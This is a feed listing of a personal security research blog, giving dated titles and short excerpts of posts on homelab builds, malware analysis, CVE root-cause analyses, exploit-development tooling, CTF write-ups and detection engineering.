/ Recent content on Arch Cloud Labs Hugo en Fri, 18 Oct 2024 00:00:00 +0000 /projects/running_acl_for_a_dollar_a_month/ Fri, 18 Oct 2024 00:00:00 +0000 /projects/running_acl_for_a_dollar_a_month/ About The Project The best blogging platforms are frictionless, and give the author control on how to create and share content. Arch Cloud Labs hosting has evolved over the years from a simple Digital Ocean droplet to a containerized deployment with CI/CD integration with a Cloud provider. This article briefly covers that journey and highlights the ease of integration and low cost of operating a modern blog with Digital Ocean’s App Platform. /projects/5-years-of-homelab/ Sun, 01 Sep 2024 00:00:00 -0400 /projects/5-years-of-homelab/ About the Project Five years ago, on September 22 2019, I published my first blog post titled “New Homelab”. This began a journey in documenting side-projects done on nights and weekends to build skills in Reverse Engineering, Malware Analysis, and other InfoSec disciplines. While originally created to build a resume of projects for future employers, it evolved into a platform that afforded me opportunities to teach workshops at leading security conferences, land a new job, compete in a international malware analysis competition, contribute to large offensive security projects, and even have my own content referenced in other researcher’s offensive security blogs and workshops. /projects/deploying-hackfortress/ Sun, 18 Aug 2024 00:00:00 +0000 /projects/deploying-hackfortress/ About The Project Hack Fortress (HF) is a combination of a first person shooter (Team Fortress 2), and a jeopardy style CTF. Teams of ten are assembled with six gamers and four hackers in a single-elimination bracket. Hackers solve challenges and unlock points to buy in-game items for gamers. Each round is thirty minutes long except for the finals which run for forty-five minutes I’ve previously blogged about Hack Fortress(12) challenges, but this blog post is going to cover how each round of challenges have been deployed for the last 7-ish years at DEF CON and Shmoocon. /projects/dwarffortress/ Sun, 07 Jul 2024 00:00:00 -0400 /projects/dwarffortress/ About The Project The video game hacking community is often a source of inspiration for those in the information security field. From in-depth memory hooking techniques to circumvent anti-cheat to beating the final boss via Cheat Engine scripts, there’s always something to learn that’s parallel to the challenges faced by those in the offensive or defensive field. The techniques discussed in this blog are analogous to methodologies used for malware analysis when dealing with custom packers. /projects/polly2pdf/ Sat, 18 May 2024 00:00:00 -0400 /projects/polly2pdf/ About The Project Trying to stay up to date with the latest security research is challenging. There are countless security blog posts, and interesting academic papers to keep up with. Realistically you don’t have time to sit down and read everything that looks interesting. Wouldn’t it be great to have your own personal “Audible”-esque service to listen to articles as you did chores around the house? This blog post is about integrating AWS’ Text-to-Speech service, “Polly” to generate audio clips of academic paper abstracts. /projects/defcon-esv-2023/ Wed, 10 Apr 2024 00:00:00 +0000 /projects/defcon-esv-2023/ This past year at DEF CON, the Embedded Systems Village (ESV) sold a custom badge that at the time, I thought was a CTF challenge. Fast forward months later when I’ve actually sat down to look at the badge, It turns out the badge is centered around a “FTDI chip” which enables communication to multiple embedded communication protocols. The badge actually enabled CTF contestants at DEF CON to poke at embedded systems, and is a pretty useful device for the casual hardware hacker. /projects/hackfortressos/ Sun, 14 Jan 2024 00:00:00 -0400 /projects/hackfortressos/ About The Project Arch Cloud Labs’ last three blog posts were diving into different aspects of IoT/embedded vulnerabilities. Coming off of these bug hunting adventures, I wanted to build a unique set of Capture The Flag (CTF) challenges for this year’s Hack Fortress. To do this, I referenced OWASP’s Top 10 for IoT and Buildroot to build the custom operating system for a Raspberry Pi 1 that was deemed “HackFortress OS”. /projects/trendnet-731br-spi-flash-dump/ Sun, 19 Nov 2023 00:00:00 +0000 /projects/trendnet-731br-spi-flash-dump/ About The Project Continuing on Arch Cloud Labs’ hardware and router reverse engineering journey, I wanted to dump the firmware of my TrendNet-731BRv1 via reading flash memory from the PCB vs downloading the firmware from TrendNet’s website. Considering a scenario where the firmware was no longer hosted publicly by TrendNet, (after all it is a discontinued product) being able to dump firmware off of a device is not only useful for situations dealing with deprecated hardware but also for poking at weird devices you might find at a garage sale or DEF CON’s IoT/Embedded Village. /projects/uart-shells/ Sun, 05 Nov 2023 00:00:00 +0000 /projects/uart-shells/ About The Project Continuing from Arch Cloud Labs TrendNet 731BR router hacking blog post tearing apart firmware, we’ll now start poking at router hardware! The primary objective is to grow my skills in the embedded security domain for DEF CON’s IoT and Embedded Security Villages next year. This weekend’s project focused on a GL-AR750. I originally bought this router in 2017 as a travel router, and it has been collecting dust in my closet for quite some time. /projects/trendnet-731br/ Sun, 29 Oct 2023 00:00:00 +0000 /projects/trendnet-731br/ About The Project I recently bought an discontinued TrendNet Router to become more proficient at reverse engineering embedded systems. Each year at DEF CON, the IoT Village,and Embedded Village have CTFs/hands-on workshops, and I’m hoping to get my skills up to par to go and take a crack at one of them next year. TrendNet home router model “TEW-731BRv2” has a known vulnerability identified by CVE-2015-1187) that leads to remote code execution. /projects/debuginfod/ Sun, 22 Oct 2023 00:00:00 +0000 /projects/debuginfod/ About The Project Modern Software Development environments have significant debugging capabilities to troubleshoot issues with the complex nature of modern software . These debugging capabilities typically manifest in Interactive Development Environment (IDE) as features that extend an IDEs capability to examine the given state of an application at run time or analyze previous binary executions. The standalone GNU Debugger (gdb) is integrated in a wide variety of IDEs and other 3rd party (1,2,3) utilities to provide a robust debugging interface for end users. /projects/dll-rev-shell/ Sun, 01 Oct 2023 00:00:00 -0400 /projects/dll-rev-shell/ About The Project On September 18th, The twitter account Malware Hunter Team Tweeted about a DLL, batch script, and PowerShell script being publicly hosted at 103[.]68[.]109[.]31. Given that a DLL was being hosted, I thought it would be an interesting target to reverse engineer. This blog post is analyzing that DLL and ultimately patching this simple reverse shell to call back to a local virtual machine. OSINT Initial triage with VirusTotal reports that some vendors detect the target IP address as malicious with numerous communicating files also flagged as malicious. /projects/pwntools-automating-interactions/ Thu, 28 Sep 2023 00:00:00 +0000 /projects/pwntools-automating-interactions/ About The Project In continuation of Arch Cloud Labs’ previous blog post on Pwntools, we dive deeper into the Pwntools framework, focusing on automating interactions with binary programs. Imagine a scenario where you need your binary to follow a specific path before deploying your final payload. Simply piping your shellcode into the binary won’t suffice. This is where Pwntools’ “io” methods come to the rescue, simplifying the automation of both local and remote exploits across a variety of protocols. /projects/pwntools-shellcraft/ Mon, 18 Sep 2023 00:00:00 +0000 /projects/pwntools-shellcraft/ About The Project Following up from Arch Cloud Labs’ previous blog post on Pwntools, we’ll continue to explore the pwntools framework this time focusing on shellcode generation. It’s not uncommon in the world of pwn/reverse engineering challenges for a requirement of the challenge to be to execute shellcode. Ultimately the end goal may be to obtain access to a remote system, or simply display the contents of a file. Instead of searching for shellcode on exploit-db or Packet Storm pwntools provides an easy to use interface to generate said shellcode. /projects/pwntools-bof/ Thu, 07 Sep 2023 00:00:00 +0000 /projects/pwntools-bof/ About The Project Pwndbg and Pwntools are Python frameworks for automating different parts of exploit development. These frameworks are highly popular amongst CTF players as they simplify and accelerate the creation of Proof of Concept (PoC) scripts for memory corruption exploits. I’m not proficient in using pwntools, and pwndbg, but this marks the beginning of a series of blogs aimed at improving my skills with pwntools for memory corruption CTF challenges. /projects/gdb-debugging-1/ Thu, 06 Jul 2023 00:00:00 +0000 /projects/gdb-debugging-1/ About the Project Several tutorials exist on how to leverage the GNU Debugger (GDB) to debug misbehaving applications. However, a majority of these blogs just show commands to run that poke at memory addresses, and don’t show the process of resolving said bug. This blog post will walk through how I recently identified, tried to fix, and ultimately reported a bug in dhcpcd 10.0.1 via gdb. Identifying The Issue The command line utility coredumpctl is used to interact with the coredumps saved by the systemd-coredump service. /projects/inotify/ Sun, 11 Jun 2023 00:00:00 +0000 /projects/inotify/ About The Project Recently I’ve been building rudimentary file monitoring tools to get better at Golang, and build faux-watchdog programs for research at Arch Cloud Labs. Through this experimentation, I’ve identified some interesting gaps in the inotify subsystem that are new to me, but are well documented in the Linux man pages. This blog post will explore how to circumvent read detections implemented by inotify. Inotify As a Monitoring Solution Per the Linux man page, the inotify subsystem: /projects/uncovering_a_phishing_scam/ Sat, 25 Mar 2023 00:00:00 -0400 /projects/uncovering_a_phishing_scam/ About The Project Recently a close friend fell victim to a scam that resulted in giving access to their laptop to a scammer via LogMeIn. This type of scam is inline with “refund scams” that YouTubers create videos for where they spend hours on call with the scammers to waste their time. This blog post will discuss the steps Arch Cloud Labs took post-access, the artifacts recovered and ultimately examining the phishing infrastructure. /projects/cve-2022-4883/ Sun, 19 Mar 2023 00:00:00 +0000 /projects/cve-2022-4883/ About The Project CVE-2022-4883 outlines a Linux PATH hijacking vulnerability in the libxpm package. Libxpm is used in a variety of projects to parse “X Pixmap” images. The National Vulnerability Database rates this vulnerability at a CVSS score of 8.8 and Red Hat has given it a CVSS score of 8.1. Per, the Arch Linux package page, 39 packages currently list libxpm as a dependency. This blog post will walk through the vulnerability and exploitation of said vulnerability. /projects/disabling-clamav-as-unprivileged-user/ Sun, 19 Feb 2023 00:00:00 +0000 /projects/disabling-clamav-as-unprivileged-user/ About The Project ClamAV is an Open Source antivirus engine that is widely used on mail servers to scan incoming messages. On February 15, 2023 ClamAV published a security advisory detailing a potential remote code execution vulnerability in its HFS+ file parser. This vulnerability was given the CVE identifier of CVE-2023-20032. While reading about this vulnerability, I stumbled across an open pull request indicating that its possible for non-privileged users to disable clamav. /projects/shellcode_gpt/ Mon, 13 Feb 2023 00:00:00 +0000 /projects/shellcode_gpt/ About The Project GPT3 has caught the InfoSec world by storm, and there’s a million tweets, posts, articles, etc… with interesting use cases. Most of these use cases I’ve seen are focused around offensive/red team tooling. A notable exception is with IDA Pro/Ghidra plugins that aid in commenting assembly code blocks with plain english (or close to) explanations of what’s going on. Arch Cloud Labs has historically posted on how to generate shellcode with radare2 as well as how to extract shellcode with Ghidra. /projects/cve-2022-46330/ Sun, 08 Jan 2023 00:00:00 +0000 /projects/cve-2022-46330/ About The Project In December of 2022, a DLL Hijacking vulnerability with a CVSS score of 7.8 was reported in the Squirrel.Windows auto-install/update utility. This blog post will analyze the vulnerability, and analyze the root cause of said issue with procmon. Analyzing the Security Advisory Squirrel.Windows is an installation utility for Windows desktop applications that does not require a traditional Windows wizzard installation. CVE-2022-46330 states that, Squirrel.Windows is both a toolset and a library that provides installation and update functionality for Windows desktop applications. /projects/know_your_tools/ Thu, 05 Jan 2023 00:00:00 +0000 /projects/know_your_tools/ Know Your Tools, and Fear No Bug One of my favorite series of blog posts of all time is “Unix as an IDE”. These blog posts walks you through how your Unix/Linux environment is your IDE. This philosophy of thought challenges using a dedicated IDE for development, as all the tools you need are already on your Operating System. Debugger integration? Why not just use gdb rather than the wrapper your IDE provides? /projects/cve-2022-23093/ Wed, 21 Dec 2022 00:00:00 +0000 /projects/cve-2022-23093/ About The Project In November of 2022 the FreeBSD project announced CVE-2022-23093, a buffer overflow vulnerability in the ping utility. This blog post will analyze the vulnerability as well as document the steps to setup said environment to analyze the root cause of the issue with gdb. Illuminating the Security Advisory The FreeBSD advisory gave the following description to the vulnerability: ping reads raw IP packets from the network to process responses in the pr_pack() function. /projects/detecting-off-the-land/ Sat, 17 Dec 2022 00:00:00 +0000 /projects/detecting-off-the-land/ About The Project Several Red Team projects exists to “live off the land” and avoid introducing additional executables into an environment. This gives Red Teamers and adversaries an advantage to not risk something within their toolkit from gettin caught by the latest and greatest EDR. But what about the Blue Teamers? The DFIR engineers out there tireless working to ensure the saftey of an organization? This blog post highlights how to integrate Team Cymru’s Malware Hash Registry with your workflow for quickly identifying whether or not something requires more investigation within your environment. /projects/loadlibrary-analysis/ Sun, 13 Nov 2022 12:33:36 -0400 /projects/loadlibrary-analysis/ About the Project Today, we’re going to analyze a malicious binary recently identified by Arch Cloud Labs malware collection system “Archie”. This binary leverages the LoadLibraryA function to resolve DLLs at run time for additional functionality. Malware samples typically do this to ensure there’s limited information in the import table in an attempt to avoid triggering static rule detection, or evade EDR products. This particular sample struct me as interesting because of the stack string obfuscation method used which Ghidra did not disassemble correctly. /projects/cryptojacking-adopts-termite-c2-utility/ Sun, 23 Oct 2022 00:00:00 +0000 /projects/cryptojacking-adopts-termite-c2-utility/ About The Project Last week I looked at a Cryptojacking campaign that leveraged a curl trick in the bash dropper to resolve IPv4 addresses from large integers values. Revisiting the bash dropper, I discovered the threat actor has updated the script to download and execute a command-and-control payload called “Termite” from the Platypus Github project. This blog walks through the analysis of termite agent, and how to statically identify the upstream IPv4 address in use. /projects/bash_dropper_tricks/ Sat, 15 Oct 2022 00:00:00 -0400 /projects/bash_dropper_tricks/ About The Project Today we’re going to look at a couple neat curl tricks I found in a recent bash dropper I was analyzing that resulted in surprisingly low VirusTotal detentions! As previously blogged about([1][2][3]), Arch Cloud Labs runs a handful of honeypots to collect attacker data to hone my skills in DFIR topics . While this was just another Cryptominer targeting an exposed docker socket, the initial dropper script used a neat trick with curl that I think was worth a quick write up. /projects/detection_engineering_with_falco/ Tue, 20 Sep 2022 00:00:00 +0000 /projects/detection_engineering_with_falco/ About The Project I’m currently studying for my Certified Kubernetes Security Specialist (CKS) certification. As apart of this certification, training courses recommend looking into runtime security provided by Falco. Falco is a Cloud Native Computing Foundation project created by Sysdig that allows for cloud, container and Kubernetes based log alerting. While training courses such as “A Cloud Guru” do a good job of covering container and host based log ingestion with Falco, I wanted to experiment with CloudTrail data as well. /projects/bulk-cs-analysis/ Fri, 01 Jul 2022 14:22:22 +0000 /projects/bulk-cs-analysis/ About The Project Security researcher Silas Cutler recently tweeted a link to a unique data set of Cobalt Strike Beacon payloads, and their extracted configurations (thanks Silas!). This is a fairly large data set going back to November of 2021, and containing over 100k entries (112,900 to be exact, but I had trouble parsing about 900 of them). This blog post will take a quick look at a subset of the data (112,066 total records) provided by said dataset within Elasticsearch. /projects/slsa-1/ Sun, 10 Apr 2022 00:00:00 +0000 /projects/slsa-1/ About The Project Recently I’ve started supporting a package in the Arch User Repository (AUR) in order to contribute to the Arch Linux project. In an effort to “automate all the things!”, I have regular Jenkins builds cloning and building the upstream Github project. This blog post outlines how I’ve tried to aligned to the Supply Chain Level for Software Artifacts framework as an exercise in securing build supply chains for community contributions. /projects/dumb_fuzzing/ Mon, 21 Feb 2022 00:00:00 +0000 /projects/dumb_fuzzing/ About The Project The e-zine tmp.out focuses on ELF/Linux related research in a style of Phrack. After reading an article on fuzzing radare2 for 0days in 30 lines of code, I thought it would be a fun weekend project to extend this research, and port their code to a container and deploy it in a Kubernetes cluster. To take it one step further, building fresh releases of the radare2 project’s master branch, and integrating it into a CI/CD pipeline which then deployed container builds to a Kuberentes cluster seemed like an excellent way to really go overboard and just eat away my entire weekend. /projects/binary_loaders_1/ Sun, 13 Feb 2022 00:00:00 -0400 /projects/binary_loaders_1/ About The Project Lately I’ve been playing around more with binary exploitation CTF challenges. This blog post will cover recent experimentation with ELF binary loaders, and extending them to fetch a remote resource, load it into memory, and finally execute it. There are several github repos with different purpose built binary loaders for ELFs/PEs/Machos/etc… so it was easy to focus on experimentation and debugging rather than “why won’t my code compile? /projects/discord-notifications-for-aws-billing/ Wed, 26 Jan 2022 20:00:36 -0400 /projects/discord-notifications-for-aws-billing/ About the Project Lately, I’ve seen some horror stories (1, 2) about side projects gone awry resulting in HUGE cloud bills. As a homelab enthusiast, and cloud user I wanted to write up some notes on how I stay ontop of billing to avoid surprise costs. This blog will outline some alerting pipeline I’ve built in my homelab. Building Notification Pipelines AWS Billing allows for e-mail notifications in the event you’re approaching a particular self-defined billing threshold. /projects/r2_shellcode_generation/ Sun, 19 Dec 2021 00:00:00 +0000 /projects/r2_shellcode_generation/ About The Project With IDA Pro’s recent announcement of going to a subscription model it has some revisiting the current state of available decompilers. Off the top of my head you have Hopper, Ghidra, Radare2/Cutter, and of course Binary Ninja. Each of these utilities have their own pros and cons and also considering how frequently you’re spending time performing reverse engineering one may make more sense than the other with regards to monetary investment. /projects/diving-into-kubernetes/ Mon, 06 Sep 2021 00:00:00 +0000 /projects/diving-into-kubernetes/ Preparing for The CKA & Diving into the Kubes I recently passed the Linux Foundation’s Certified Kubernetes Administrator (CKA) certification and thought I’d throw some notes together on how I prepared. The CKA is a hands-on practical test. There are no multiple-choice questions, just raw application of Kubernetes knowledge. Overall I enjoyed the CKA, and find that the questions asked in the exam challenges real-world examples of the day-to-day task I run into with Kubernetes. /projects/two_years_blogging/ Sun, 15 Aug 2021 00:00:00 +0000 /projects/two_years_blogging/ The Art of The Homelab I’ve been homelabbing/blogging about side projects for about two years now and thought I’d compile a list of things that have been useful to me in my homelabbing journey. These are just my opinions and everyone’s goals for their homelab are different. I view my homelab as a blank canvas upon which to experiment, fail, learn and share said failures (or successes) with others. It’s a labor of love, but nothing makes my day like a Youtube/Reddit comment that says “hey this is awesome, thank you for sharing”. /projects/threat-intel-in-the-homelab/ Thu, 29 Apr 2021 02:30:00 +0000 /projects/threat-intel-in-the-homelab/ About The Project Threat Intelligence comes in many forms and services that help enable the analyst, incident responder, reverse engineer, etc… to be aware of ongoing threats against enterprise environments. As a home lab enthusiast, I don’t have access to enterprise subscriptions (ex: Virustotal) to obtain insight into the latest threats. Luckily for the community, several free resources exist. This blog post will focus on how I leverage free or low cost services to gain a deeper understanding of malicious domains and obtain malware samples to perform analysis on. /projects/poking-at-elasticsearch-beyond-dumping-data/ Sun, 28 Mar 2021 00:00:00 +0000 /projects/poking-at-elasticsearch-beyond-dumping-data/ About The Project Elasticsearch is a key component in many backend centralized logging stacks. Several Open Source and commercial software appliances leverage Elasticsearch in one way or another. This is especially true for the SIEM space. While there are many blogs on how to assess/extract data from an Elasticsearch cluster during a pentest/red team assessment, I have not seen a lot of conversations on how the discovery of an Elasticsearch server can be leveraged beyond just dumping data. /projects/tracking-crypto-miners-in-the-homelab-2-new-tricks/ Sat, 20 Feb 2021 12:50:00 +0000 /projects/tracking-crypto-miners-in-the-homelab-2-new-tricks/ About The Project Continuing from the last blog post that discussed malicious Linux Cryptocurrency miners, I have discovered new activity that blends two of my previous Cryptocurrency mining malware (aka Cryptojacking) blog posts. By taking a deeper look at infrastructure, and code artifacts some interesting parallels can be drawn between the same actor(s) that Trend Micro refers to as Skidmap and another Golang Cryptojacking malware variant that Palo Alto has just recently deemed “Watchdog”. /projects/auditd-cve-2021-3156/ Fri, 12 Feb 2021 00:00:00 +0000 /projects/auditd-cve-2021-3156/ About The Project CVE-2021-3156 is a 10-year-old sudo vulnerability that allows for privilege escalation in Linux environments. If you’re responsible for a Linux server, this definitely caught your attention due to the severity. Some rough PoCs wound up Github and also on exploit-db recently. Besides patching through upstream providers supplied pathches[0,1], how would you hunt for this in your environment? This leads me to leveraging auditd in the previously blogged about red team range. /projects/ghidra_scripting_01/ Fri, 22 Jan 2021 22:22:22 +0000 /projects/ghidra_scripting_01/ About the Project The more Cryptominer malware I look at (or anything targeting Linux), the more trends I’ve identified that are common regardless of the underlying intent. Everyone loves to use UPX. And why wouldn’t they? It’s a free Open Source packer that you can modify if you so choose, or leverage what’s available in most Linux distribution repos. Everyone loves embedding ELFs in ELFs. In my anecdotal analysis, Cryptominers have triaged systems for basic OS information before deciding which 2nd stage payload to drop. /projects/dll-hijacking-for-persistence/ Sun, 06 Dec 2020 00:00:00 +0000 /projects/dll-hijacking-for-persistence/ About The Project With the pandemic in full swing and work from home being normal it’s natural to upgrade your home setup to make work as enjoyable as possible. Maybe you don’t have those nice monitors at home that you do have at work, but hey at least you bought a new mouse and no longer have to use the track pack! This is where the project comes into play. /projects/tracking_cryptominer_domains/ Thu, 26 Nov 2020 00:00:00 +0000 /projects/tracking_cryptominer_domains/ About the Project Since July of 2020, I have been running a “honeypot” of sorts made by anthok to capture all requests coming in on specific ports. By listening on ports commonly used by databases such as Elasticsearch or Redis, we’ve been able to observe a lot of bot behavior. Most of the requests resulted in trying to gain an initial foothold onto the environment to run a bash script to bring down their stage-1 malware. /projects/exploits-in-the-attic/ Thu, 19 Nov 2020 00:00:00 +0000 /projects/exploits-in-the-attic/ About The Project - Taking a look in the Attic I was poking around at PRs and issues within the Metasploit project and stumbled across something pretty interesting. There’s a GitHub label that exists within the Metasploit project called “attic”. The “attic” label from my observations appears to be for modules that maintainers or contributors need to finish up but don’t quite have the time. Much like that shoebox full of comic books, you carefully set it aside in the attic to return to it at a later date (if at all). /projects/dumping-memory-with-av/ Wed, 18 Nov 2020 00:00:00 +0000 /projects/dumping-memory-with-av/ About The Project Tools native to an operating system that can be leveraged offensively are always attractive to red teamers. You can go a long way with Powershell and other native Windows utilities during engagements, but perhaps sometimes these utilities are too loud for your use case. With PowerShell script block and Powershell module logging enabled within an environment, you’re being detected along the way. Wouldn’t it be nice if there were various tools already installed that can be leveraged for offensive purposes? /projects/signed_binary_proxy_execution/ Tue, 13 Oct 2020 22:33:36 -0400 /projects/signed_binary_proxy_execution/ About the Project Signed Binary Proxy Execution is a method of executing a command or executable by proxy of an another signed executable. This method can be leveraged by those in the offensive computing community to bypass defensive mechanisms. By leveraging an executable that has been digitally signed, the trust of that application is being used to perform a particular malicious action. This post explores leveraging Signed Binary Proxy Execution via Pycharm, a popular Python IDE. /projects/analysis_of_a_cryptocurrency_miner/ Sun, 02 Aug 2020 00:00:00 +0000 /projects/analysis_of_a_cryptocurrency_miner/ About The Project Given the recent news of the Meow attacks, I was curious about obtaining malware data related to Elasticsearch attacks. I’m a huge fan of Elasticsearch and use it heavily in my side-projects. I’m aware of the dangers of exposing a fresh database install on the open internet. So I simply set up a netcat listener and redirected the output to a file. I was pleasantly surprised at how successful this was. /projects/poshc2-payloads/ Thu, 16 Jul 2020 00:00:00 +0000 /projects/poshc2-payloads/ About the Project At the time of this writing PoshC2 has a Python and Bash agent that can be deployed on a target machine. Both utilities offer a plethora of ways that can be modified to achieve execution and initial delivery in unique ways. The lovely thing about Linux is that there is always another way to achieve the same goal. This second video in Arch Cloud Lab’s PoshC2 series explores how to begin making basic changes to the PoshC2 dropper as well as some inspiration for others to go and do more. /projects/poshc2-intro/ Sat, 27 Jun 2020 00:00:00 +0000 /projects/poshc2-intro/ About the Project For the first time Arch Cloud Labs will be posting a video tutorial on how to get started with PoshC2 in a Linux environment. This video assumes some prior experience with Linux/offensive tooling frameworks, and provides just enough information to get you up and running with PoshC2. For those interested in what the exact configurations used in the video were, please checkout the snippets below. Check out the video here. /projects/redteam_range/ Sat, 16 May 2020 13:30:36 -0400 /projects/redteam_range/ About the Project C2 Frameworks seem to keep popping up with neat features and add-ons. I wanted to create a lab environment where I could experiment with said utilities, and understand what the forensic footprint looked like for each tool. This led to “shellcompany.lan”, my red team range environment for tool testing and experimentation. Environment Considerations & Initial Design When initially designing the environment, I wanted to emulate a small business network with significant logging of both host and network data. /projects/houseplant_ctf/ Mon, 27 Apr 2020 21:30:36 -0400 /projects/houseplant_ctf/ Houseplant CTF 2020 - Imagery CTF challenge “Imagery” was a high-value forensics puzzle with the following description: Photography is good fun. I took a photo of my 10 Windows earlier on but it turned out too big for my photo viewer. Apparently 2GB is too big. :( https://drive.google.com/file/d/1y4sfIaUrAOK0wXiDZXiOI-q2SYs6M--g/view?usp=sharing Alternate: https://mega.nz/file/R00hgCIa#e0gMZjsGI0cqw88GzbEzKhcijWGTEPQsst4QMfRlNqg Dev: Tom Upon downloading the image, I originally ran basic forensic triaging tools on the large blob in an attempt to identify what it was. /projects/covid19-domain-analysis/ Sun, 29 Mar 2020 14:33:36 -0400 /projects/covid19-domain-analysis/ About The Project Over the past two weeks, I have been analyzing registered domain names correlated to the current pandemic as a side project. This was all inspired by @jeremiahg’s tweet about the ever-growing number of registered domains related to “covid-19”. During times of crisis, malicious actors act to profit on those in fear or those showing compassion for their fellow humans. One avenue of profit phishing. There is no shortage of historical data relating to scams during times of crisis([0][1][2]) to capitalize on fear (click this to be safe) and sympathy (donate here for a good cause). /projects/vimrc-as-a-persistence-mechanism/ Wed, 04 Mar 2020 22:00:36 -0400 /projects/vimrc-as-a-persistence-mechanism/ ISTS - Collegiate Red vs Blue Competition This past weekend the Rochester Institute of Technology’s security club ritsec put on their annual Information Security Talent Search competition. This competition requires Blue Team members to keep critical services (logging clusters, web servers, Active Directory, etc…) running, complete business injects and provide customer support all while being infiltrated by a Red Team. A big twist on this competition is that the Blue Teams can attack other Blue Team members. /projects/forensic_fortress/ Thu, 06 Feb 2020 18:33:36 -0400 /projects/forensic_fortress/ Hack Fortress: Forensic Challenges This past Shmoocon, the Hack Fortress group returned to deliver another action pack day of Team Fortress 2 and hacking. As previously discussed, Hack Fortress is a combination of a First Person Shooter (Team Fortress 2) and a jeopardy style CTF. Teams of ten are assembled with six gamers and four hackers in a single-elimination bracket. Hackers solve challenges and unlock points to buy in-game items for gamers. /projects/is-this-normal/ Thu, 26 Dec 2019 13:30:36 -0400 /projects/is-this-normal/ About The Project Continuing from my Malware Analysis Pipeline project, I have been spending some time tearing apart samples trying to get better at malware analysis. Doing so, I run across files that I’ve never heard of before. Obviously, Google is the first stop during the triage period of an unknown function call/DLL, etc… However, what if the DLL dropped was a modified version of a legitimate application? This is where the NSRL comes into play. /projects/malware-analysis-pipeline-2/ Mon, 11 Nov 2019 16:00:36 -0400 /projects/malware-analysis-pipeline-2/ About The Project In a previous blog post, I covered how I was obtaining samples, extracting metadata, and querying the results. I’ve moved from testing in Docker containers to stand-alone VMs. Since I have a steady flow of binaries, I need to tag the binaries with something meaningful, so I’m not just aimlessly looking through binary after binary. YARA was the answer for tagging samples. Additional minor improvements were also made in the homelab to prevent any accidental malware execution. /projects/malware-analysis-pipeline-1/ Tue, 29 Oct 2019 14:33:36 -0400 /projects/malware-analysis-pipeline-1/ About The Project I wanted to further my malware analysis/reverse engineering skills and create a simple malware analysis pipeline. The pipeline I planned to build can be seen below. By collecting metadata about the binaries (imports/exports/pdbs/etc…) I can quickly filter and pivot on a subset of features that interest me. Over time it may be possible to enrich this data and have something really unique in the old homelab. However, before any analysis can begin I need to acquire samples. /projects/re-1/ Wed, 02 Oct 2019 18:33:36 -0400 /projects/re-1/ Hack Fortress RE Challenge: Troll Hunter What is Hack Fortress? Hack Fortress is a combination of a First Person Shooter (Team Fortress2) and a jeopardy style CTF. Teams of ten are assembled with six gamers and four hackers in a single-elimination bracket. Hackers solve challenges and unlock points to buy in-game items for gamers. Each round is thirty minutes long except for the finals which run for forty-five minutes. This event has been running consistently at DEF CON and Shmoocon for almost ten years! /projects/new-homelab/ Sun, 22 Sep 2019 22:22:22 +0000 /projects/new-homelab/ Why Build it? - The Origin Story Scrolling through Twitter and seeing my InfoSec friends and role models post crazy malware analysis writeups, CVE disclosures, and custom tool blog posts; I ask myself “How can I become better?”. How can I advance and diversify my skillset from the 9-5 I currently have? From my experience “homelabbing”, CTFs and conference talks have increased my perspective and exposure to technologies and ideas I otherwise would not normally encounter. /about/welcome/ Sun, 22 Sep 2019 22:20:50 +0000 /about/welcome/ Welcome to Arch Cloud Labs! Arch Cloud Labs is a personal blog site for my side projects, CTFs write-ups, independent research, and other ramblings. All content here is done on the author’s own time and does not reflect the view of their employer(s). Talks DEF CON 2023 - WINE Pairing with Malware DevSecOps Days 2023 - Golfing with Dragons: Building Secure Environments for CTF Competitions ATT&CKCON 3.0 2022 - ATT&CKING Containers in The Cloud SANS 2021 Blue Team Summit (Lighting Talk) - Living off The Cloud DEF CON 2021 - Strace for Binary Analysis Interpol Digital Forensics Expert Group (DFEG) 2020 - Down with The Sickness: Hunting COVID-19 Phishing Domains Shmoocon 2019 - Weapons of Text Destruction DFRWS-EU 2018 - CASE Technical Implementation Workshop BSides Roc 2016 - RedOps: Scaling Your Pwnage Other Notable Mentions VX-Underground & SentinelOne: Malware Competition Finalist Exploitable Bugs in Cryptocurrency Miners (No-CVE) Local Privilege Escalation in Chef <= 12. /workshops/workshops/ Sun, 22 Sep 2019 22:20:50 +0000 /workshops/workshops/ DIY Malware Homelab Course Do you have the desire to grow your skills in Malware Analysis, RE, and Software Engineering beyond just following tutorials? Arch Cloud Labs was built on honeypots and analyzing malware samples in a homelab environment to create a unique way to build those skills. This course offers a quick taste of building malware analysis pipeline in your homelab to recreate analysis done by large firms as well as inspire you to do analysis of your own.